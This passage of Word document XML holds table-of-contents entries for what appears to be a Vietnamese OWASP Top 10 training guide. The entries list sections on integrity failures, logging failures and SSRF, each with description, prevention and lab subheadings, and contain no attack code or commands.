            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909857 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="339B0AD7" w14:textId="041564B8" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909858" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909858 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>46</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5DFB9CF1" w14:textId="337642C7" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909859" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909859 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="18C0A44B" w14:textId="09F96C8D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909860" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909860 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>47</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="316B8373" w14:textId="22D4EC4D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909861" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A08:2021 – Software and Data Integrity Failures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909861 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="049EA115" w14:textId="1F26F582" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909862" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909862 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="54964EFC" w14:textId="46B277CD" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909863" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909863 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>51</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="256107C5" w14:textId="5C03C899" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909864" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909864 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1673CB77" w14:textId="7AF6D73D" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909865" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909865 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>52</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73513EDD" w14:textId="2080A5A7" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909866" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A09:2021 – Security Logging and Monitoring Failures</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909866 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EE58BB1" w14:textId="609FBB81" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909867" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Mô tả lỗ hổng</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909867 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="172CABE4" w14:textId="0330F68C" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909868" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Biện pháp ngăn chặn</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909868 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>57</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="27CB1236" w14:textId="6580DBED" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="880"/>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909869" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
                <w:noProof/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kịch bản tấn công thực hành</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909869 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="348666ED" w14:textId="53503370" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909870" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Bài thực hành – Lab 1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909870 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>58</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23276C9D" w14:textId="4256D8B9" w:rsidR="00F26440" w:rsidRDefault="00F26440">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9678"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:sz w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc182909871" w:history="1">
            <w:r w:rsidRPr="006B2174">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>A10:2021 – Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc182909871 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>61</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
